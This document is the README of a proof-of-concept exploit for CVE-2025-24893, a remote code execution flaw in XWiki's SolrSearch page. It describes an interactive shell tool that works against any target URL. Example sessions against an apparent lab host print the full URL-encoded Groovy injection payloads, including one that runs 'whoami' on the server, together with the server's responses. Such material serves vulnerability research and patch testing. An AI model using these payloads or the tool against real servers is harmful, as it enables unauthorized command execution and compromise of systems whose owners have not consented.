This is a small script for the rce vulnerability for CVE-2025-24893. It supports basic input/output## Infos
This PoC first tests for the SSTI and if it works.
It will go in loop and allows you to run commands remotly.
The `exec` and `shell` command do the same currently.
## Installation
```bash
python3 -m pip install requirements.txt
```
## Usage
### Connecting
```bash
python3 poc.py <target>
```
## Example
### With debug set to False (default)
```bash
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
xwiki
```
### With debug set to True
The debug flag at the top of the script will show you the generated urls.
It will create a debug.log file in which contains the raw response of the request.
```bash
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
```
[4.0K] /data/pocs/731250f444e5798c4112a166f7e64d436022cd35
├── [5.1K] poc.py
├── [1.7K] README.md
└── [ 24] requirements.txt
0 directories, 3 files